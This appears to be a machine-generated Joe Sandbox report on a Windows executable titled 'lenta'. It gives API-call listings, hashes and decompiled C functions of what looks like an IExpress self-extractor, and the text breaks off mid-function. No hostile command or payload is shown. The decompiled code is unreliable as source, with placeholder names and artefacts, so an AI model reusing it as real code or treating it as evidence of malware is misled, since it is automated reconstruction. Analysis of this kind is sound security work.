                                                                                                                                                                                                                                                0x00053279
                                                                                                                                                                                                                                                0x00053298
                                                                                                                                                                                                                                                0x0005329d
                                                                                                                                                                                                                                                0x0005329f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000532b0
                                                                                                                                                                                                                                                0x000532b6
                                                                                                                                                                                                                                                0x000532b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000532be
                                                                                                                                                                                                                                                0x00053280
                                                                                                                                                                                                                                                0x00053289
                                                                                                                                                                                                                                                0x0005328e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005328e
                                                                                                                                                                                                                                                0x0005327b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005327b
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000003E8,00058598,00000200), ref: 00053271
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 000533E2
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 000533F7
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00053410
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000836), ref: 00053426
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 0005342D
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0005343F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                                                                                                                                                                                                • API String ID: 2418873061-406680565
                                                                                                                                                                                                                                                • Opcode ID: 20ca5870124be0c8b7673dcb0efca8d5ddbdbaa9241293a9d2debc53f921d8c7
                                                                                                                                                                                                                                                • Instruction ID: 57af0957728353ca2c5dcff57755c5be47d0fc4c8db771c78f5acf9d1e4cf914
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20ca5870124be0c8b7673dcb0efca8d5ddbdbaa9241293a9d2debc53f921d8c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D512330380740BAFB621B354C4CFBF2E8CDB86B87F104528FE01960C1CAB88B499665
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00052CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				struct HRSRC__* _t31;
                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t13 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                                				_t65 = 0;
                                                                                                                                                                                                                                                				_t66 = __ecx;
                                                                                                                                                                                                                                                				_t48 = __edx;
                                                                                                                                                                                                                                                				 *0x59a3c = __ecx;
                                                                                                                                                                                                                                                				memset(0x59140, 0, 0x8fc);
                                                                                                                                                                                                                                                				memset(0x58a20, 0, 0x32c);
                                                                                                                                                                                                                                                				memset(0x588c0, 0, 0x104);
                                                                                                                                                                                                                                                				 *0x593ec = 1;
                                                                                                                                                                                                                                                				_t20 = E0005468F("TITLE", 0x59154, 0x7f);
                                                                                                                                                                                                                                                				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                                					_t64 = 0x4b1;
                                                                                                                                                                                                                                                					goto L32;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                                					 *0x5858c = _t27;
                                                                                                                                                                                                                                                					SetEvent(_t27);
                                                                                                                                                                                                                                                					_t64 = 0x59a34;
                                                                                                                                                                                                                                                					if(E0005468F("EXTRACTOPT", 0x59a34, 4) != 0) {
                                                                                                                                                                                                                                                						if(( *0x59a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                                							 *0x59120 =  *0x59120 & _t65;
                                                                                                                                                                                                                                                							if(E00055C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                                								if( *0x58a3a == 0) {
                                                                                                                                                                                                                                                									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                                									if(_t31 != 0) {
                                                                                                                                                                                                                                                										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if( *0x58184 != 0) {
                                                                                                                                                                                                                                                										__imp__#17();
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if( *0x58a24 == 0) {
                                                                                                                                                                                                                                                										_t57 = _t65;
                                                                                                                                                                                                                                                										if(E000536EE(_t65) == 0) {
                                                                                                                                                                                                                                                											goto L33;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t33 =  *0x59a40; // 0x3
                                                                                                                                                                                                                                                											_t48 = 1;
                                                                                                                                                                                                                                                											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                                												if(( *0x59a34 & 0x00000100) == 0 || ( *0x58a38 & 0x00000001) != 0 || E000518A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                                													goto L30;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t64 = 0x7d6;
                                                                                                                                                                                                                                                													if(E00056517(_t57, 0x7d6, _t34, E000519E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                                														goto L33;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L30;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												L30:
                                                                                                                                                                                                                                                												_t23 = _t48;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t23 = 1;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E00052390(0x58a3a);
                                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t64 = 0x520;
                                                                                                                                                                                                                                                								L32:
                                                                                                                                                                                                                                                								E000544B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                								goto L33;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t64 =  &_v268;
                                                                                                                                                                                                                                                							if(E0005468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                								goto L3;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                                								 *0x58588 = _t43;
                                                                                                                                                                                                                                                								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									if(( *0x59a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                                										_t64 = 0x524;
                                                                                                                                                                                                                                                										if(E000544B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                                											goto L12;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L11;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t64 = 0x54b;
                                                                                                                                                                                                                                                										E000544B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                                										L11:
                                                                                                                                                                                                                                                										CloseHandle( *0x58588);
                                                                                                                                                                                                                                                										 *0x59124 = 0x800700b7;
                                                                                                                                                                                                                                                										goto L33;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                						_t64 = 0x4b1;
                                                                                                                                                                                                                                                						E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						 *0x59124 = 0x80070714;
                                                                                                                                                                                                                                                						L33:
                                                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00052CD9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00052CE9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00052CF9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00052D34
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00052D40
                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00052DAE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00052DBD
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00052E0A
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                                • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                                • Opcode ID: d389a787426483f5cee60cdcd45cea87e1b14b36050a5408999a10d5dc60df9b
                                                                                                                                                                                                                                                • Instruction ID: 48a108b54eb7b93755162f3392b09e93e7435b2d8e9dccafa47bfb6acb7a72d1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d389a787426483f5cee60cdcd45cea87e1b14b36050a5408999a10d5dc60df9b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B51C370340301AAFB60A7319C4BBBB26D8DF47707F044439BE46D61D6DAB8888DCB26
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                                			E000534F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                				struct HWND__* _t35;
                                                                                                                                                                                                                                                				struct HWND__* _t38;
                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t9 == 0) {
                                                                                                                                                                                                                                                					__eflags = 1;
                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					 *0x591d8 = 1;
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					_push(_a4);
                                                                                                                                                                                                                                                					L21:
                                                                                                                                                                                                                                                					EndDialog();
                                                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                                				_pop(1);
                                                                                                                                                                                                                                                				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                                				if(_t12 == 0) {
                                                                                                                                                                                                                                                					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                                					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L19;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                                                                                                                					_t35 = _a4;
                                                                                                                                                                                                                                                					 *0x58584 = _t35;
                                                                                                                                                                                                                                                					E000543D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                                					__eflags =  *0x58184; // 0x1
                                                                                                                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                                                                                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                                					_t17 = CreateThread(0, 0, E00054FE0, 0, 0, 0x58798);
                                                                                                                                                                                                                                                					 *0x5879c = _t17;
                                                                                                                                                                                                                                                					__eflags = _t17;
                                                                                                                                                                                                                                                					if(_t17 != 0) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						E000544B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(_t35);
                                                                                                                                                                                                                                                						goto L21;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t23 = _t13 - 1;
                                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                                					__eflags = _a12 - 2;
                                                                                                                                                                                                                                                					if(_a12 != 2) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					ResetEvent( *0x5858c);
                                                                                                                                                                                                                                                					_t38 =  *0x58584; // 0x0
                                                                                                                                                                                                                                                					_t25 = E000544B9(_t38, 0x4b2, 0x51140, 0, 0x20, 4);
                                                                                                                                                                                                                                                					__eflags = _t25 - 6;
                                                                                                                                                                                                                                                					if(_t25 == 6) {
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						 *0x591d8 = 1;
                                                                                                                                                                                                                                                						SetEvent( *0x5858c);
                                                                                                                                                                                                                                                						_t39 =  *0x5879c; // 0x0
                                                                                                                                                                                                                                                						E00053680(_t39);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t25 - 1;
                                                                                                                                                                                                                                                					if(_t25 == 1) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetEvent( *0x5858c);
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                                					TerminateThread( *0x5879c, 0);
                                                                                                                                                                                                                                                					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000), ref: 00053535
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00053541
                                                                                                                                                                                                                                                • ResetEvent.KERNEL32 ref: 0005355F
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00051140,00000000,00000020,00000004), ref: 00053590
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 000535C7
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 000535F1
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 000535F8
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 00053610
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00053617
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00053623
                                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 00053637
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00053671
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 6120de889ee2c29268d144f6bf30ef9d0f1bd98fdf390b73a52f7b455ca06361
                                                                                                                                                                                                                                                • Instruction ID: b110569cd9a26a6c193dfe158a8a8e57c4acd7f306eb18d91105fbbc51d5977a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6120de889ee2c29268d144f6bf30ef9d0f1bd98fdf390b73a52f7b455ca06361
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E31A731244701BBE7601F35EC4DE6B3AA8E786B87F508629FF02A52A1DB798904CF55
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                                			E00054224(char __ecx) {
                                                                                                                                                                                                                                                				char* _v8;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                                				char* _v28;
                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                				intOrPtr _v36;
    intOrPtr _v40;
    char _v44;
    char _v48;
    char _v52;
    _Unknown_base(*)()* _t26;
    _Unknown_base(*)()* _t28;
    _Unknown_base(*)()* _t29;
    _Unknown_base(*)()* _t32;
    char _t42;
    char* _t44;
    char* _t61;
    void* _t63;
    char* _t65;
    struct HINSTANCE__* _t66;
    char _t67;
    void* _t71;
    char _t76;
    intOrPtr _t85;

    _t67 = __ecx;
    _t66 = LoadLibraryA("SHELL32.DLL");
    if(_t66 == 0) {
        _t63 = 0x4c2;
        L22:
        E000544B9(_t67, _t63, 0, 0, 0x10, 0);
        return 0;
    }
    _t26 = GetProcAddress(_t66, "SHBrowseForFolder");
    _v12 = _t26;
    if(_t26 == 0) {
        L20:
        FreeLibrary(_t66);
        _t63 = 0x4c1;
        goto L22;
    }
    _t28 = GetProcAddress(_t66, 0xc3);
    _v20 = _t28;
    if(_t28 == 0) {
        goto L20;
    }
    _t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
    _v16 = _t29;
    if(_t29 == 0) {
        goto L20;
    }
    _t76 =  *0x588c0; // 0x0
    if(_t76 != 0) {
        L10:
         *0x587a0 = 0;
        _v52 = _t67;
        _v48 = 0;
        _v44 = 0;
        _v40 = 0x58598;
        _v36 = 1;
        _v32 = E00054200;
        _v28 = 0x588c0;
         *0x5a288( &_v52);
        _t32 =  *_v12();
        if(_t71 != _t71) {
            asm("int 0x29");
        }
        _v12 = _t32;
        if(_t32 != 0) {
             *0x5a288(_t32, 0x588c0);
             *_v16();
            if(_t71 != _t71) {
                asm("int 0x29");
            }
            if( *0x588c0 != 0) {
                E00051680(0x587a0, 0x104, 0x588c0);
            }
             *0x5a288(_v12);
             *_v20();
            if(_t71 != _t71) {
                asm("int 0x29");
            }
        }
        FreeLibrary(_t66);
        _t85 =  *0x587a0; // 0x0
        return 0 | _t85 != 0x00000000;
    } else {
        GetTempPathA(0x104, 0x588c0);
        _t61 = 0x588c0;
        _t4 =  &(_t61[1]); // 0x588c1
        _t65 = _t4;
        do {
            _t42 =  *_t61;
            _t61 =  &(_t61[1]);
        } while (_t42 != 0);
        _t5 = _t61 - _t65 + 0x588c0; // 0xb1181
        _t44 = CharPrevA(0x588c0, _t5);
        _v8 = _t44;
        if( *_t44 == 0x5c &&  *(CharPrevA(0x588c0, _t44)) != 0x3a) {
             *_v8 = 0;
        }
        goto L10;
    }
}
                                                                                                                                                                                                                                                0x0005432f
                                                                                                                                                                                                                                                0x00054334
                                                                                                                                                                                                                                                0x00054343
                                                                                                                                                                                                                                                0x00054349
                                                                                                                                                                                                                                                0x0005434d
                                                                                                                                                                                                                                                0x00054354
                                                                                                                                                                                                                                                0x00054354
                                                                                                                                                                                                                                                0x0005435d
                                                                                                                                                                                                                                                0x0005436e
                                                                                                                                                                                                                                                0x0005436e
                                                                                                                                                                                                                                                0x0005437d
                                                                                                                                                                                                                                                0x00054383
                                                                                                                                                                                                                                                0x00054387
                                                                                                                                                                                                                                                0x0005438e
                                                                                                                                                                                                                                                0x0005438e
                                                                                                                                                                                                                                                0x00054387
                                                                                                                                                                                                                                                0x00054391
                                                                                                                                                                                                                                                0x00054399
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054295
                                                                                                                                                                                                                                                0x0005429f
                                                                                                                                                                                                                                                0x000542a5
                                                                                                                                                                                                                                                0x000542aa
                                                                                                                                                                                                                                                0x000542aa
                                                                                                                                                                                                                                                0x000542ad
                                                                                                                                                                                                                                                0x000542ad
                                                                                                                                                                                                                                                0x000542af
                                                                                                                                                                                                                                                0x000542b0
                                                                                                                                                                                                                                                0x000542b6
                                                                                                                                                                                                                                                0x000542c2
                                                                                                                                                                                                                                                0x000542c8
                                                                                                                                                                                                                                                0x000542ce
                                                                                                                                                                                                                                                0x000542e4
                                                                                                                                                                                                                                                0x000542e4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000542ce

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00054236
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0005424C
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00054263
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0005427A
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,000588C0,?,00000001), ref: 0005429F
                                                                                                                                                                                                                                                • CharPrevA.USER32(000588C0,000B1181,?,00000001), ref: 000542C2
                                                                                                                                                                                                                                                • CharPrevA.USER32(000588C0,00000000,?,00000001), ref: 000542D6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00054391
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000543A5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                • Opcode ID: c281369904707f079c35e37575097dd08c59aac775090b9f770fdca6077c5641
                                                                                                                                                                                                                                                • Instruction ID: fc951d54914352d3b3e59ad84aabca189bcabc9d8110aa3ec82c880080657619
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c281369904707f079c35e37575097dd08c59aac775090b9f770fdca6077c5641
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B411574A00304AFE7109F64DC84ABF7FA4EB0534BF448169ED41AB291CF788D49CB61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00052773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
